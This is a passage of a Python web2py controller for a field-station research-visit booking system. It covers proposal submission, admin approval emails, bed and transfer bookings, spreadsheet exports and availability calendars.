uname(rvm_record.user_id, rvm_record.id)\n new_history.append(' -- Transfer booked for {} from {} on {}\\\\n'.format(\n name, console.vars.transfer, console.vars.transfer_datepicker))\n\n # --------------------------------\n # ACTION TO BOOK RAs\n # --------------------------------\n elif console.action == 'book_res_assist':\n\n ropework = (\n (console.vars.ra_rope is not None) and (console.vars.ra_rope == 'on'))\n nightwork = (\n (console.vars.ra_night is not None) and (console.vars.ra_night == 'on'))\n\n db.research_assistant_bookings.insert(research_visit_id=rv_id,\n start_date=console.vars.ra_start,\n finish_date=console.vars.ra_end,\n site_time=console.vars.ra_site_time,\n work_type=console.vars.ra_work_type)\n\n new_history.append(' -- RA booked: {} from {} to {}\\\\n'.format(\n console.vars.ra_site_time, console.vars.ra_start,\n console.vars.ra_end))\n # --------------------------------\n # SUBMIT \n # --------------------------------\n elif console.action == 'submit_proposal':\n\n # i) update the history, change the status and redirect\n hist_str = '[{}] {} {}\\\\n -- Proposal submitted\\\\n'\n new_history = hist_str.format(\n datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name) + record.admin_history\n\n record.update_record(admin_status='Submitted',\n admin_history=new_history)\n\n # ii) email the proposer\n safe_mailer(to=auth.user.email,\n subject='SAFE: research visit proposal submitted',\n template='research_visit_submitted.html',\n template_dict={'name': auth.user.first_name,\n 'url': URL('research_visits',\n 'research_visit_details',\n args=[visit.vars.id], scheme=True,\n host=True)})\n\n session.flash = CENTER(B('Research visit proposal submitted.'),\n _style='color: green')\n\n else:\n # datechange causes a processing event that doesn't do anything\n pass\n\n # update the RV record to catch history changes\n if len(new_history) > 0:\n history_update = '[{}] {} {}\\\\n'.format(\n datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name)\n history_update += ''.join(new_history)\n if record.admin_history is not None:\n history_update += record.admin_history\n else:\n history_update = record.admin_history\n record.update_record(admin_history=history_update)\n\n # reload the page to update changes\n redirect(URL('research_visit_details', args=rv_id, anchor='console'))\n\n elif console.errors:\n\n session.flash = console.errors\n\n # return the visit history\n if rv_id is not None and record.admin_history is not None:\n history = XML(record.admin_history.replace('\\\\n', '
<br/>
    '), sanitize=True,\n permitted_tags=['br/'])\n history = CAT(A(_name='history'),\n DIV(DIV(H5('Research visit history'), _class=\"panel-heading\"),\n DIV(history, _class='panel_body',\n _style='margin:10px 10px;height:100px;overflow-y:scroll'),\n DIV(_class='panel-footer'),\n _class=\"panel panel-primary\"))\n else:\n history = DIV()\n\n # If the visit record has been created and an admin is viewing, expose the \n # decision panel\n if rv_id is not None and auth.has_membership('admin') and record.admin_status == 'Submitted':\n\n admin = admin_decision_form(selector_options=['Resubmit', 'Approved'])\n\n if admin.process(formname='admin').accepted:\n\n # update record with decision\n admin_str = '[{}] {} {}\\\\n ** Decision: {}\\\\n ** Comments: {}\\\\n'\n new_history = admin_str.format(datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name,\n admin.vars.decision,\n admin.vars.comment) + record.admin_history\n\n record.update_record(admin_status=admin.vars.decision,\n admin_history=new_history)\n\n # Email decision\n proposer = record.proposer_id\n template_dict = {'name': proposer.first_name,\n 'url': URL('research_visits', 'research_visit_details',\n args=[rv_id], scheme=True, host=True),\n 'admin': auth.user.first_name + ' ' + auth.user.last_name,\n 'safe_cost_msg': safe_cost_msg}\n\n # pick an decision\n if admin.vars.decision == 'Approved':\n\n # send email message to the proposer, deputy, searrp accounts and FRM\n frm = get_frm()\n frm = [eml for eml in [frm.alternative_email, frm.email] if eml is not None]\n \n safe_mailer(to=proposer.email,\n cc=['deputy.coord@safeproject.net', 'account@searrp.org'] + frm,\n subject='SAFE: research visit proposal approved',\n template='research_visit_approved.html',\n template_dict=template_dict)\n\n # Also email MBCA with any requests for Maliau booking\n if len(maliau_select) > 0:\n\n # reuse the maliau table\n if proposer.title in ['', None, ' ', 'None']:\n proposer_name = \" \".join((proposer.first_name, proposer.last_name))\n else:\n proposer_name = \" \".join(\n (proposer.title, proposer.first_name, proposer.last_name))\n\n maliau_email_dict = {'count': len(maliau_select),\n 'maliau_table': maliau_table,\n 'proposer_name': proposer_name}\n \n safe_mailer(to='roserlie5@gmail.com',\n cc=[proposer.email, 'inid69@yahoo.com', 'jarizul.gjule@gmail.com', \n 'deputy.coord@safeproject.net'] + frm,\n reply_to=proposer.email,\n subject='Request for accommodation from the SAFE Project',\n template='maliau_beds_email.html',\n template_dict=maliau_email_dict)\n\n elif admin.vars.decision == 'Resubmit':\n\n safe_mailer(to=proposer.email,\n subject='SAFE: research visit proposal requires resubmission',\n template='research_visit_resubmit.html',\n template_dict=template_dict)\n\n # reload the page to update changes\n redirect(URL('research_visits', 'research_visit_details', args=rv_id, anchor='history'))\n\n else:\n admin = DIV()\n\n return dict(visit_record=record, visit=visit, console=console,\n history=history, admin=admin, icons=icons)\n\n\n@auth.requires_membership('admin')\ndef create_late_research_visit():\n \"\"\"\n Process to create an RV for a late booking user.\n This allows an admin to create an RV that then belongs to that user\n \"\"\"\n\n # Two possible entry points:\n # - Completely new RV request(bare URL)\n # - Project specified for new RV request (project_id as a variable, but no record)\n\n new_rv_project_requested = request.vars['new']\n\n if new_rv_project_requested is not None and 
new_rv_project_requested != '0':\n new_project_record = db.project_id(new_rv_project_requested)\n if new_project_record is None:\n session.flash = B(CENTER('Invalid new visit project reference'), _style='color:red;')\n redirect(URL('research_visits', 'create_late_research_visit'))\n else:\n new_project_record = None\n\n # provide either a project drop down or a RV details form\n if new_rv_project_requested is None:\n\n # Bare URL submitted: provide a list of available projects + look see visit\n # and redirect back to the page, with the new project_id for the next step\n proj_query = db((db.project_id.id > 0) &\n (db.project_id.project_details_id == db.project_details.id))\n rows = proj_query.select(db.project_details.project_id, db.project_details.title)\n available_project_ids = [r.project_id for r in rows]\n available_project_titles = [r.title for r in rows]\n\n project_selector = SELECT(OPTION('Look see visit', _value='0'),\n *[OPTION(title, _value=pid) for title, pid in\n zip(available_project_titles, available_project_ids)],\n _class='form-control', _name='project_selector')\n\n visit = FORM(DIV(DIV(H5('Research visit summary'), _class=\"panel-heading\"),\n DIV(DIV(LABEL('Choose project:', _class=\"control-label col-sm-2\"),\n DIV(project_selector, _class=\"col-sm-8\"),\n TAG.BUTTON('Select', _style=\"padding: 5px 15px\", _class='col-sm-2',\n _type='submit', _name='submit_project_select'),\n _class='row', _style='margin:10px 10px'),\n _class='panel_body'),\n _class=\"panel panel-primary\"))\n\n if visit.validate():\n # reload the URL with the id of the new project as a variable\n redirect(URL('research_visits', 'create_late_research_visit',\n vars={'new': visit.vars.project_selector}))\n\n else:\n\n # Now have a URL with a project requested as a variable 'research_visit_details?new='866' \n buttons = [TAG.button('Create proposal', _type=\"submit\",\n _name='save_proposal', _style='padding: 5px 15px 5px 15px;')]\n\n # get the project details\n if new_rv_project_requested != '0':\n\n # get the title\n pid = int(new_rv_project_requested)\n proj_row = db((db.project_id.id == pid) & (\n db.project_id.project_details_id == db.project_details.id))\n project_details = proj_row.select().first()\n proj_title = project_details.project_details.title\n\n # restrict the proposer id to possible coordinators\n coords = db((db.auth_user.id == db.project_members.user_id) &\n (db.project_members.project_id == pid) &\n (db.project_members.is_coordinator == 'True'))\n db.research_visit.proposer_id.requires = IS_IN_DB(coords, db.auth_user.id,\n '%(last_name)s, %(first_name)s',\n zero=None)\n else:\n project_details = None\n proj_title = 'Look see visit'\n\n # Use SQLFORM for DB input\n visit = SQLFORM(db.research_visit,\n fields=['title', 'arrival_date',\n 'departure_date', 'purpose',\n 'licence_details', 'proposer_id'],\n buttons=buttons,\n showid=False)\n\n # process the visit form to create hidden fields and to process input\n if visit.process().accepted:\n\n # insert the project_id, but not if this is a look see visit\n if new_rv_project_requested != '0':\n db.research_visit(visit.vars.id).update_record(project_id=new_rv_project_requested)\n\n # email the identified coordinator the link for the page\n proposer = db.auth_user[visit.vars.proposer_id]\n safe_mailer(to=proposer.email,\n subject='SAFE: draft short notice research visit proposal created on your behalf',\n template='research_visit_created.html',\n template_dict={'name': auth.user.first_name,\n 'url': URL('research_visits', 
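# scheme=True and host=True make this an absolute URL, so the emailed\n                                                          # link still resolves outside the application\n                                                          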
'research_visit_details',\n args=[visit.vars.id], scheme=True, host=True)})\n\n db.research_visit(visit.vars.id).update_record(admin_status='Draft',\n admin_history='Draft proposal created: {}'.format(\n datetime.datetime.utcnow().strftime(\n '%Y-%m-%dT%H:%MZ')))\n session.flash = CENTER(B('Research visit proposal created'), _style='color: green')\n\n redirect(URL('research_visits', 'research_visit_details', args=visit.vars.id))\n else:\n\n pass\n\n # Now repackage the form into a custom DIV\n # edit form widgets - notably, override the default date widget classes to allow\n # them to use the daterange datepicker\n visit.custom.widget.purpose['_rows'] = 4\n visit.custom.widget.arrival_date['_class'] = \"form-control input-sm\"\n visit.custom.widget.departure_date['_class'] = \"form-control input-sm\"\n\n proj_row = DIV(LABEL('Project title:', _class=\"control-label col-sm-2\"),\n DIV(proj_title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px')\n\n # javascript to run the datepicker without date constraints\n visit_js = datepicker_script(html_id='visit_datepicker',\n autoclose='true',\n startDate='\"\"',\n endDate='\"\"')\n\n visit = FORM(DIV(DIV(DIV(H5('Research visit summary', _class='col-sm-9'), _class='row',\n _style='margin:0px 0px'),\n _class=\"panel-heading\"),\n DIV(visit.custom.begin, proj_row,\n DIV(LABEL('Visit title:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.title, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Coordinator:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.proposer_id, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Dates:', _class=\"control-label col-sm-2\"),\n DIV(DIV(visit.custom.widget.arrival_date,\n SPAN('to', _class=\"input-group-addon input-sm\"),\n visit.custom.widget.departure_date,\n _class=\"input-daterange input-group\",\n _id=\"visit_datepicker\"),\n _class='col-sm-10'),\n _class='row', _style='margin:10px 10px'),\n DIV(LABEL('Purpose:', _class=\"control-label col-sm-2\"),\n DIV(visit.custom.widget.purpose, _class=\"col-sm-10\"),\n _class='row', _style='margin:10px 10px'),\n DIV(DIV(visit.custom.submit, _class=\"col-sm-10 col-sm-offset-2\"),\n _class='row', _style='margin:10px 10px'),\n visit.custom.end,\n _class='panel_body'),\n _class=\"panel panel-primary\"),\n visit_js)\n\n return dict(visit=visit)\n\n\ndef validate_research_visit_details(form):\n \"\"\"\n This controller checks the form that creates the initial RV entry\n \"\"\"\n\n # populate the proposer_id if this is a new entry (form has no record)\n if form.record is None:\n form.vars.proposer_id = auth.user.id\n form.vars.proposal_date = datetime.datetime.utcnow().isoformat()\n form.vars.admin_history = '[{}] {} {}\\\\n -- {}\\\\n'.format(\n datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%MZ'),\n auth.user.first_name,\n auth.user.last_name,\n 'Research visit proposal created.')\n\n # check the arrival date is more than a fortnight away\n deadline = datetime.date.today() + datetime.timedelta(days=14)\n if form.vars.arrival_date < deadline and not auth.has_membership('admin'):\n form.errors.arrival_date = '14 days notice required. 
Arrival date must be later than {}.'.format(\n deadline.isoformat())\n\n # check the departure date is after the arrival date\n # TODO - think about day visits\n if form.vars.arrival_date >= form.vars.departure_date:\n form.errors.departure_date = 'The departure date must be later than the arrival date'\n\n\ndef validate_research_visit_details_console(form):\n \"\"\"\n This function checks the wide range of actions available\n from the panels for a created RV - all the panels form one\n big form that share the visitor selection checkboxes so\n there are multiple submit buttons that use the information\n in the console form in different ways\n \"\"\"\n\n # the request captures the datechange hidden field and \n # the name of any submit button pressed\n request_keys = list(request.vars.keys())\n\n # retrieve the record for the related visit\n rv = db.research_visit(form.vars.id)\n\n # sanitize the visitor row selectors, which can be\n # - missing (none selected) \n # - a single string (one selected)\n # - a list of strings (2+ selected)\n # so convert to a consistent list and make strings into numbers\n if form.vars.records is None:\n form.vars.records = []\n elif type(form.vars.records) is str:\n form.vars.records = [int(form.vars.records)]\n else:\n form.vars.records = [int(x) for x in form.vars.records]\n\n # Two kinds of actions (delete_XXX and replace_visitor) operate\n # via submit buttons encoding row ids. These submit an empty value\n # but have a key name of format: delete_rowtype_rowid\n # e.g. delete_transfer_47 is a request to delete the transfer record\n # with id 47 \n\n form.action = None\n\n for k in request_keys:\n if \"delete_\" in k:\n\n form.action = 'delete'\n form.delete = k.split('_')[1:]\n\n elif \"replace\" in k:\n\n form.action = 'replace_visitor'\n form.vars.user = [int(k.split('_')[2]), int(form.vars.user)]\n\n # if no delete/replace action then look for other actions simply by matching strings\n if form.action is None:\n\n # list of submit buttons (and one hidden action)\n submit_ids = set([\"add_visitor\", \"add_project\",\n \"reserve_beds\", \"release_beds\", \"book_transfer\",\n \"book_res_assist\", \"submit_proposal\", 'datechange'])\n\n action = list(submit_ids.intersection(request_keys))\n\n # check for oddities and pass the action back across to the processing actions\n if (len(action) != 1):\n form.errors = 'Error with action identification.'\n else:\n action = action[0]\n form.action = action\n\n # catching and checking dates\n # - onchange event for dates triggers a submit with a hidden datechange field\n # that we can intercept\n if action == 'datechange':\n\n # store the dates as datetime objects\n arrival_datetime = datetime.datetime.strptime(form.vars.arrival_date, '%Y-%m-%d').date()\n departure_datetime = datetime.datetime.strptime(form.vars.departure_date,\n '%Y-%m-%d').date()\n\n deadline = datetime.date.today() + datetime.timedelta(days=14)\n\n # check arrival date and departure date separately to allow defaults on each independently\n if arrival_datetime < deadline:\n # check the from date is more than a fortnight away\n form.errors.arrival_date = '14 days notice required for all bookings. 
Must be later than {}.'.format(\n deadline.isoformat())\n elif arrival_datetime < rv.arrival_date:\n # check we are inside the visit window.\n form.errors.arrival_date = 'This date is before the research visit arrival date ({}).'.format(\n rv.arrival_date.isoformat())\n else:\n # all good, so store the arrival date in session\n session.safe.arrival_datetime = arrival_datetime\n session.safe.arrival_date = form.vars.arrival_date\n\n if departure_datetime > rv.departure_date:\n form.errors.departure_date = 'This date is after the research visit departure date ({}).'.format(\n rv.departure_date.isoformat())\n\n elif arrival_datetime >= departure_datetime:\n # check the departure date is after the arrival date\n form.errors.departure_date = 'The departure date must be later than the arrival date'\n else:\n # all good, so store the departure date in session\n session.safe.departure_datetime = departure_datetime\n session.safe.departure_date = form.vars.departure_date\n\n if session.safe.departure_date is not None and session.safe.arrival_date is not None:\n __check_availability()\n\n elif action == 'add_visitor':\n\n # get the format correct \n if form.vars.user == '0':\n form.vars.user = None\n else:\n form.vars.user = int(form.vars.user)\n\n # check to see they aren't already a member\n visit_members = db(db.research_visit_member.research_visit_id == form.vars.id).select(\n db.research_visit_member.user_id)\n m = [r.user_id for r in visit_members]\n\n # strip None from m to allow multiple unknown users\n m = [x for x in m if x is not None]\n\n if form.vars.user in m:\n form.errors.user = \"User already a member of this research visit.\"\n\n elif action == 'add_project':\n\n # check this is a project visit (don't add everyone in the world!)\n if rv.project_id is None:\n form.errors.user = \"Cannot add project members for look see visits.\"\n\n # get the project members and current visit members\n project_members = db(db.project_members.project_id == rv.project_id).select(\n db.project_members.user_id)\n visit_members = db(db.research_visit_member.research_visit_id == rv.id).select(\n db.research_visit_member.user_id)\n\n p = [r.user_id for r in project_members]\n r = [r.user_id for r in visit_members]\n new = set(p).difference(r)\n\n if len(new) > 0:\n form.vars.user = new\n else:\n form.errors.user = \"No new project members to add.\"\n\n elif action == 'reserve_beds':\n\n if len(form.vars.records) == 0:\n form.errors.user = 'You must select visitors to book for.'\n\n if (form.vars.accom_arrive == '') or (form.vars.accom_depart == ''):\n form.errors.accom_arrive = 'You must set dates to book accommodation.'\n\n elif action == 'release_beds':\n\n if len(form.vars.records) == 0:\n form.errors.user = 'You must select which visitors to release beds for.'\n\n if (form.vars.accom_arrive == '') or (form.vars.accom_depart == ''):\n form.errors.accom_arrive = 'You must set dates to release accommodation.'\n\n elif action == 'book_transfer':\n\n if len(form.vars.records) == 0:\n form.errors.user = 'You must select visitors to transfer'\n\n if (form.vars.transfer_datepicker == ''):\n form.errors.transfer_datepicker = 'You must set a date to book transfers.'\n\n elif action == 'book_res_assist':\n\n if (form.vars.ra_start == '') or (form.vars.ra_end == ''):\n form.errors.ra_site_time = 'You must set dates to book research assistants.'\n\n\n# -----------------------------------------------------------------------------\n# HELPER FUNCTIONS - protected from being called as a webpage using __name()\n# 
-----------------------------------------------------------------------------\n\ndef __check_availability():\n \"\"\"\n Updates the availability information stored in session\n - called from check availability and post booking SAFE\n \"\"\"\n\n if ((session.safe.arrival_date is not None) &\n (session.safe.arrival_date is not None)):\n # check how many reservations overlap the whole period\n existing_res = db((db.bed_reservations_safe.departure_date > session.safe.arrival_date) &\n (db.bed_reservations_safe.arrival_date < session.safe.departure_date))\n\n # store the availability\n session.safe.avail = n_beds_available - existing_res.count()\n\n\ndef __book_beds(site_table, flds):\n \"\"\"\n Function to look for existing records in a table and book \n - expecting to be passed a dictionary of fields to insert \n via **args and that those will contain some key checking\n fields: research_visit_member_id, arrival_date, departure_date\n \"\"\"\n\n # look for existing bookings at this site that intersect this one\n existing = db((db[site_table].research_visit_member_id == flds['research_visit_member_id']) &\n (db[site_table].departure_date >= flds['arrival_date']) &\n (db[site_table].arrival_date <= flds['departure_date']))\n\n if existing.count() > 0:\n\n # otherwise find the existing selections that overlap and get the date ranges\n existing = existing.select()\n\n # need to convert dates from string\n arrival_date = datetime.datetime.strptime(flds['arrival_date'], '%Y-%m-%d').date()\n departure_date = datetime.datetime.strptime(flds['departure_date'], '%Y-%m-%d').date()\n\n arr_dates = [r.arrival_date for r in existing]\n dep_dates = [r.departure_date for r in existing]\n arr_dates.append(arrival_date)\n dep_dates.append(departure_date)\n flds['arrival_date'] = min(arr_dates)\n flds['departure_date'] = max(dep_dates)\n\n # delete the existing overlapping records\n for e in existing:\n e.delete_record()\n\n # add the new spanning record\n db[site_table].insert(**flds)\n\n\ndef __release_beds(site_table, flds):\n \"\"\"\n Function to look for existing records in a table and book \n - expecting to be passed a dictionary of fields and that those will contain\n some key checking fields: research_visit_member_id, arrival_date, departure_date\n \"\"\"\n\n # look for existing bookings at this site that intersect this one\n existing = db((db[site_table].research_visit_member_id == flds['research_visit_member_id']) &\n (db[site_table].departure_date >= flds['arrival_date']) &\n (db[site_table].arrival_date <= flds['departure_date']))\n\n if existing.count() > 0:\n\n # can only remove if there are bookings that overlap\n existing = existing.select()\n\n # need to convert dates from string\n release_start = datetime.datetime.strptime(flds['arrival_date'], '%Y-%m-%d').date()\n release_end = datetime.datetime.strptime(flds['departure_date'], '%Y-%m-%d').date()\n\n for e in existing:\n\n arr_in_ex = e.arrival_date < release_start < e.departure_date\n dep_in_ex = e.arrival_date < release_end < e.departure_date\n spans = ((release_start < e.arrival_date) &\n (e.departure_date < release_end))\n\n # look at each one in turn to see whether to delete/truncate\n if (arr_in_ex and not dep_in_ex):\n # 1) truncating the end of the visit\n e.update_record(departure_date=release_start)\n elif (not arr_in_ex and dep_in_ex):\n # 2) truncating the start of the visit\n e.update_record(arrival_date=release_end)\n elif (spans):\n # 3) visit completely covered so delete\n e.delete_record()\n elif (arr_in_ex and dep_in_ex):\n 
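# illustrative example: releasing 5th-10th from a booking that spans\n                # 1st-15th should leave two records, 1st-5th and 10th-15th\n                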
# 4) visit split by deletion period, so truncate and insert\n current_end = e.departure_date\n e.departure_date = release_start\n db[site_table].insert(**db[site_table]._filter_fields(e))\n e.arrival_date = release_end\n e.departure_date = current_end\n db[site_table].insert(**db[site_table]._filter_fields(e))\n e.delete_record()\n else:\n # non-overlapping\n pass\n\n\ndef __book_release_beds(records, site, mode):\n # book a bed for each checked record\n for rid in records:\n\n # get the user id from this row in the research_visit_member table\n rid = int(rid)\n row = db.research_visit_member(rid)\n\n # look for existing bookings at this site that intersect this one\n existing = db((db.bed_reservations.research_visit_member_id == rid) &\n (db.bed_reservations.departure_date >= session.safe.arrival_date) &\n (db.bed_reservations.arrival_date <= session.safe.departure_date) &\n (db.bed_reservations.site == site))\n\n if mode == 'book':\n\n if existing.count() == 0:\n # if nothing overlapping already exists, create a new entry\n db.bed_reservations.insert(site=site,\n research_visit_id=row.research_visit_id,\n research_visit_member_id=rid,\n arrival_date=session.safe.arrival_date,\n departure_date=session.safe.departure_date,\n user_id=row.user_id)\n else:\n # otherwise find everthing that overlaps and get the date ranges\n existing = existing.select()\n arr_dates = [r.arrival_date for r in existing]\n arr_dates.append(\n datetime.datetime.strptime(session.safe.arrival_date, '%Y-%m-%d').date())\n dep_dates = [r.departure_date for r in existing]\n dep_dates.append(\n datetime.datetime.strptime(session.safe.departure_date, '%Y-%m-%d').date())\n\n # delete the existing overlapping records\n for e in existing:\n db(db.bed_reservations.id == e.id).delete()\n\n # add the new spanning record\n db.bed_reservations.insert(site=site,\n research_visit_id=row.research_visit_id,\n research_visit_member_id=rid,\n arrival_date=min(arr_dates),\n departure_date=max(dep_dates),\n user_id=row.user_id)\n elif mode == 'release':\n\n if existing.count() > 0:\n # can only remove if there are bookings that overlap\n # TODO - add flash if there are no actions?\n existing = existing.select()\n for e in existing:\n\n arr_in_ex = e.arrival_date < session.safe.arrival_datetime < e.departure_date\n dep_in_ex = e.arrival_date < session.safe.departure_datetime < e.departure_date\n spans = ((session.safe.arrival_datetime < e.arrival_date) &\n (e.departure_date < session.safe.departure_datetime))\n\n # look at each one in turn to see whether to delete/truncate\n if (arr_in_ex and not dep_in_ex):\n # 1) truncating the end of the visit\n db(db.bed_reservations.id == e.id).update(\n departure_date=session.safe.arrival_date)\n elif (not arr_in_ex and dep_in_ex):\n # 2) truncating the start of the visit\n db(db.bed_reservations.id == e.id).update(\n departure_date=session.safe.departure_date)\n elif (spans):\n # 3) visit completely covered so delete\n db(db.bed_reservations.id == e.id).delete()\n elif (arr_in_ex and dep_in_ex):\n # 4) visit split by deletion period, so truncate and insert\n db(db.bed_reservations.id == e.id).update(\n departure_date=session.safe.arrival_date)\n db.bed_reservations.insert(site=site,\n research_visit_id=row.research_visit_id,\n research_visit_member_id=rid,\n arrival_date=session.safe.departure_date,\n departure_date=e.departure_date,\n user_id=row.user_id)\n else:\n # non-overlapping\n pass\n\n\ndef date_range(start, end):\n days = []\n curr = start\n while curr <= end:\n days.append(curr)\n curr 
+= datetime.timedelta(days=1)\n\n return (days)\n\n\ndef export_my_research_visit():\n \"\"\"\n This fetches an excel workbook containing the intinerary for a single research\n visit and pokes it out as an http download, so a button can call the controller\n and return the file via the browser.\n \"\"\"\n\n # Get the specific visit requested\n rv_id = request.args(0)\n\n # Check if the record exists and get the workbook object\n if rv_id is not None:\n record = db.research_visit[rv_id]\n excelfile = single_rv_summary_excel(rv_id)\n if record is None:\n session.flash = CENTER(\n B('Export request for non existant research visit', _style='color:red'))\n return\n else:\n session.flash = CENTER(\n B('Export request for research visit missing a visit_id', _style='color:red'))\n return\n\n # and now poke the workbook object out to the browser\n response.headers[\n 'Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n attachment = 'attachment;filename=SAFE_Bed_reservations_{}.xlsx'.format(\n datetime.date.today().isoformat())\n response.headers['Content-Disposition'] = attachment\n raise HTTP(200, excelfile,\n **{\n 'Content-Type': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n 'Content-Disposition': attachment + ';'})\n\n\ndef export_ongoing_research_visits():\n \"\"\"\n This fetches an excel workbook compiling all ongoing and future research \n visit data and pokes it out as an http download, so a button can call the \n controller and return the file via the browser.\n \"\"\"\n\n # check there is any data\n today = datetime.date.today()\n rv_query = (db.research_visit.departure_date >= today)\n\n # no records?\n if db(rv_query).count() == 0:\n session.flash = CENTER(B('No research visit data found', _style='color:red'))\n redirect(URL('research_visits', 'research_visits'))\n else:\n # grab the data from those queries starting with the earliest arrivals\n excel_file = all_rv_summary_excel()\n\n # and now poke the workbook object out to the browser\n response.headers[\n 'Content-Type'] = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'\n attachment = 'attachment;filename=SAFE_Bed_reservations_{}.xlsx'.format(today.isoformat())\n response.headers['Content-Disposition'] = attachment\n raise HTTP(200, excel_file,\n **{\n 'Content-Type': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n 'Content-Disposition': attachment + ';'})\n\n\ndef export_ongoing_research_visits_text():\n \"\"\"\n This just fetches the text summary and pokes it out as an http download\n \"\"\"\n\n # GET THE ONGOING RVs \n today = datetime.date.today()\n rv_query = (db.research_visit.departure_date >= today)\n\n # no records?\n if db(rv_query).count() == 0:\n session.flash = CENTER(B('No research visit data found', _style='color:red'))\n redirect(URL('research_visits', 'research_visits'))\n else:\n # grab the data from those queries starting with the earliest arrivals\n text_file = all_rv_summary_text()\n\n # and now poke the text object out to the browser\n response.headers['Content-Type'] = 'text/plain'\n attachment = 'attachment;filename=SAFE_Research_Visit_details_{}.txt'.format(\n datetime.date.today().isoformat())\n response.headers['Content-Disposition'] = attachment\n raise HTTP(200, text_file,\n **{'Content-Type': 'text/plain',\n 'Content-Disposition': attachment + ';'})\n\n\ndef safe_bed_availability():\n \"\"\"\n This controller:\n - creates data for a free beds view using fullcalendar javascript\n - combining this and the 
booking on a single page causes issues\n \"\"\"\n\n # get the dates when beds are booked and the status of the RV that\n # they are associated with\n # and select as an iterable of rows\n bed_data = db(db.bed_reservations_safe.research_visit_id == db.research_visit.id)\n rows = bed_data.select()\n\n # Need to expand the date range of a visit to calculate the\n # beds available by day\n approved = []\n pending = []\n\n for r in rows:\n\n dates = date_range(r.bed_reservations_safe.arrival_date,\n r.bed_reservations_safe.departure_date)\n\n if r.research_visit.admin_status == 'Approved':\n approved.extend(dates)\n else:\n pending.extend(dates)\n\n # now tabulate and align to get days\n pending = Counter(pending)\n approved = Counter(approved)\n\n # Calculate availability across dates with pending or approved bookings:\n # - handling admin approved overbooking by truncating to zero\n # - package into a list of dictionaries {'type', 'date', 'n'}\n dates = set(list(pending.keys()) + list(approved.keys()))\n pend = [0 if pending[d] is None else pending[d] for d in dates]\n conf = [0 if approved[d] is None else approved[d] for d in dates]\n avail = [{'type': 'available', 'date': d, 'n': max(0, n_beds_available - (x + y))}\n for x, y, d in zip(pend, conf, dates)]\n\n # get pending and approved in the same format\n pending = [{'type': 'pending', 'date': k, 'n': v} for k, v in pending.items()]\n approved = [{'type': 'confirmed', 'date': k, 'n': v} for k, v in approved.items()]\n\n # now create a list of events to pass to the view as a JS array\n colors = {'pending': '#CC9900', 'confirmed': '#CC0000', 'available': '#228B22'}\n event_order = {'confirmed': 3, 'pending': 2, 'available': 1}\n events = []\n for event in avail + pending + approved:\n events.append({'title': '{n} {type}'.format(**event),\n 'start': event['date'].isoformat(),\n 'orderField': event_order[event['type']],\n 'backgroundColor': colors[event['type']],\n 'borderColor': colors[event['type']]})\n\n return dict(events=XML(json(events)))\n\n\ndef safe_transfers_schedule():\n \"\"\"\n This controller:\n - creates data for a free beds view using fullcalendar javascript\n - combining this and the booking on a single page causes issues\n - serves up the data from this query:\n select t.transfer_date, t.transfer, r.admin_status, count(t.research_visit_member_id) \n from transfers t \n join research_visit r\n on (t.research_visit_id = r.id)\n where r.admin_status <> 'Draft'\n group by t.transfer_date, t.transfer, r.admin_status\n order by t.transfer_date;\n \"\"\"\n\n # get counts of people on each transfer route by RV status\n qry = ((db.transfers.research_visit_id == db.research_visit.id) &\n (db.research_visit.admin_status != 'Draft'))\n # set up a condition test \n is_approved = (db.research_visit.admin_status == 'Approved').case('Yes', 'No')\n transfer_data = db(qry).select(db.transfers.transfer_date.with_alias('date'),\n db.transfers.transfer.with_alias('transfer'),\n is_approved.with_alias('approved'),\n db.transfers.research_visit_member_id.count().with_alias(\n 'count'),\n groupby=[db.transfers.transfer_date,\n db.transfers.transfer,\n db.research_visit.admin_status])\n\n # now package up that data as event data for calendar.js, and \n # poke it back to the view, where it will populate the calendar\n colors = {'No': '#CC9900', 'Yes': '#228B22'}\n\n events = []\n for row in transfer_data:\n events.append({'title': '{transfer}: {count}'.format(**row),\n 'start': row.date.isoformat(),\n 'orderField': 1,\n 'backgroundColor': 
colors[row.approved],\n 'borderColor': colors[row.approved]})\n\n # helpfully the JSON serialiser makes JS compatible inputs, which\n # just needs to be protected from HTML mangling\n return dict(events=XML(json(events)), frm=get_frm())\n\n\n# -----------------------------------------------------------------------------\n# ADMINISTER NEW VISITS\n# -----------------------------------------------------------------------------\n\n\n# decorator restricts access to admin users\n# - the link is only revealed in the menu for admin users but \n# that doesn't prevent pasting in the link!\n@auth.requires_membership('admin')\ndef administer_research_visits():\n \"\"\"\n This controller handles:\n - presenting admin users with a list of current submitted proposals for research visits \n - allows the admin to approve or reject visit requests but also gives write access \n and admins have unlocked constraints on dates and beds, so can add to a users proposal\n \"\"\"\n\n links = [dict(header='', body=lambda row: approval_icons[row.admin_status]),\n dict(header='', body=lambda row: A('Details', _class='button btn btn-default'\n , _href=URL(\"research_visits\",\n \"research_visit_details\",\n args=[row.id])))\n ]\n\n db.research_visit.admin_status.readable = False\n\n # get a query of pending requests with user_id\n form = SQLFORM.grid(query=(db.research_visit.admin_status == 'Submitted'), csv=False,\n fields=[db.research_visit.project_id,\n db.research_visit.title,\n db.research_visit.admin_status],\n maxtextlength=250,\n deletable=False,\n editable=False,\n create=False,\n details=False,\n links=links\n )\n\n return dict(form=form)\n\n\n# -----------------------------------------------------------------------------\n# SERVICES\n# -----------------------------------------------------------------------------\n\ndef call():\n session.forget()\n return service()\n\n\n@service.json\ndef check_safe_bed_availability():\n \"\"\"\n JSON service to get the maximum number of available beds \n between two dates\n \"\"\"\n\n try:\n # get the from and to dates from the call\n from_date = datetime.datetime.strptime(request.vars['from'], 